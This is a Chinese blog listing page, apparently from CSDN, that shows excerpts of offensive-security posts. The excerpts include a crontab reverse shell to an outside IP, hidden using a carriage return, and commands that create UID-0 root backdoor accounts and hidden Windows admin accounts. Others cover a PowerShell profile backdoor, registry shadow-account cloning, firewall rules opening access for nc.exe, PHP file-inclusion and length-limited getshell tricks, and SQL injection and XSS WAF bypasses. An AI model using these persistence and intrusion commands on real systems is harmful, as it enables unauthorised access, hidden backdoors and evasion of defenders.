自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

shiyingai

欲戴王冠 必承其重

  • 博客(15)
  • 收藏
  • 关注

原创 防火墙相关命令

查看防火墙配置netsh firewall show config允许指定程序全部连接(Windows Server 2003 系统及之前版本)netsh firewall add allowedprogram c:\nc.exe "allow nc" enable允许指定程序连入(Windows Server 2003 之后系统版本)netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="

2022-04-14 17:04:36 3030 1

原创 一行代码开启python、php简易服务

python# python2python2 -m SimpleHTTPServer 8080# python3python3 -m http.server 8080phpphp -S 127.0.0.1:8080

2022-04-14 16:56:52 704

原创 python脚本小技巧

交换变量值a, b = 5, 10a, b = b, a将列表中所有元素组合成字符串(以空格分隔)a = ["Python", "is", "awesome"]print(" ".join(a))查找列表中频率最高的值a = [1, 2, 3, 1, 2, 3, 2, 2, 4, 5, 1]print(max(set(a),key = a.count))检查两个字符串是不是由相同字母不同顺序组成from collections import CounterCounter(str1

2021-12-25 22:18:08 462

原创 PHP伪协议-文件包含

lfi.php<?php include $_GET['file'];?>php://input  php://input 可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。注:当enctype="multipart/form-data",php://input 是无效的。

2021-12-24 22:39:54 1988

原创 隐藏计划任务反弹shell

靶机执行(crontab -l;printf "* * * * * /bin/bash -c '/bin/sh -i >& /dev/tcp/192.168.79.3/2334 0>&1';\r%100c\n")|crontab -vps监听nc -lvvp 2334  该计划任务是隐藏的,使用contab -e,选择一种编辑器后可以查看到内容...

2021-12-22 22:28:37 2157

原创 创建具有root权限的账户

第一种# guest:123456useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test第二种# t0mcat:123456perl -le 'print crypt("123456","salt")' # 密码:123456echo "t0mcat:sahL5d5V.UWtI:0:0:/root:/bin/bash" >&

2021-12-21 22:51:19 528

原创 SQL注入绕过

空格字符绕过 %09 TAB建(水平) %0a 新建一行,换行 %0b TAB建(垂直) %0c 新的一页 %0d return 功能 %a0 空格 %00 /**/ /*!*/、/*!50009*/ # 受版本限制内联执行浮点数和科学计数法绕过某些WAFNULL值和 \N 绕过某些WAF引号绕过  如果过滤了单引号,可以使用双引号、反引号或者十六进制去重绕过过滤逗号join绕过like绕过

2021-12-20 22:51:34 219

原创 组策略脚本维持

  在gpedit.msc上打开组策略,在Windows设置选项上有个脚本(启动/关机)选项  脚本参数可为空# shell.bat 放在开机自启动目录net user hack$ 123456 /add && net localgroup administrators hack$ /add

2021-12-19 22:39:14 2056

原创 PowerShell配置文件后门

  PowerShell 配置文件是在 PowerShell 启动时运行的脚本。  在某些情况下,攻击者可以通过滥用PowerShell配置文件来获得持久性和提升特权。修改这些配置文件,以包括任意命令,功能,模块和/或PowerShell驱动器来获得持久性。案例echo $profile Test-path $profile # 结果返回false,表示没有该文件New-Item –Path $Profile –Type File –Force # 强制创建一个$string = 'S

2021-12-18 23:18:36 1143

原创 Windows隐藏文件

attrib命令隐藏文件夹或文件attrib +s +a +h +r testAttrib +s +a +h +r 1.php恢复隐藏的文件attrib d:\test -h -s /d /sattrib d:\"*" -h -s /d /s

2021-12-17 22:21:23 75

原创 创建影子账号

  在账号后面加个美元符,可以隐藏账号;但仅仅只是在命令行无法查看到,在用户面板仍然可以看到该账号。解决办法进入注册表HEKY_LOCAL_MACHINE\SAM\SAM\Domains\Account\User编辑需要权限查看Administrator账号对应的文件复制该文件内容(右键全选-》复制)F文件粘贴替换掉需要隐藏账号的内容分别导出这两个文件导出后,删除该账号也可以使用命令行来删除ner user hacker$ /del删除后,双击刚刚导出的两个文件,导入到注册

2021-12-15 20:01:00 378

原创 远程终端问题集锦

1.描述  远程终端的默认端口是3389,云vps一般会开启,没有启用的情况下,在较高的权限下可以使用注册表命令进行开启。2.注册表开启远程终端命令2.1 2008 2012 2016 开启3389,写入到bat文件中echo DO ALL IN CMD!reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfDenyTSConnections /t REG_DWORD /d 0 /fre

2021-12-14 20:59:12 2443

原创 一不小心发现某站的存储型XSS

一不小心发现某站的存储型XSS  废话不多说,直接开干。经过测试,在个人资料板块,发现MSN处可以利用。  输入123,审计源码,分析HTML,尝试构造payload。闭合value属性" <scritp>alert(1)</script>//  发现有waf,直接被ban了。en……………… 尝试能否绕过看看。  输入成对的 ”<>“ 符号时,会被拦截,估计规则库匹配了成对的 ”<>“;这样子看的话,插入标签是不太好利用了。  换个思

2021-09-27 19:48:44 1264

原创 可控字符串长度受限情况下GetShell

可控字符串长度受限情况下GetShell思路分析利用案例EXP环境:命令执行只允许输入七个字符,尝试写入webshell思路分析  通过创建特殊的文件名(含有php代码),创建完后使用ls命令:ls>0 (把当前目录下所有的文件名写入到文件0中)。  shell命令太长,受长度限制,可以使用 “” 来分割,实现换行输入,最后写入到一个新的文件,然后执行:sh 0。文件0 执行后产生 1.php 就是写入的php马。注:要考虑写入的先后顺序问题,使用ls可以加上-t参数来排序(最新创建的在

2021-09-23 21:00:18 451

原创 PHP正则回溯溢出绕过

PHP正则绕过案例代码分析EXP案例代码<?php function is_php($data){ return preg_match('/<\?.*[(`;?>].*/is',$data); } if(empty($_FILES)) { die(show_source(__FILE__)) ; } $user_dir = './data/'; $data = file_get_contents($_FIL

2021-09-22 20:07:02 366

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除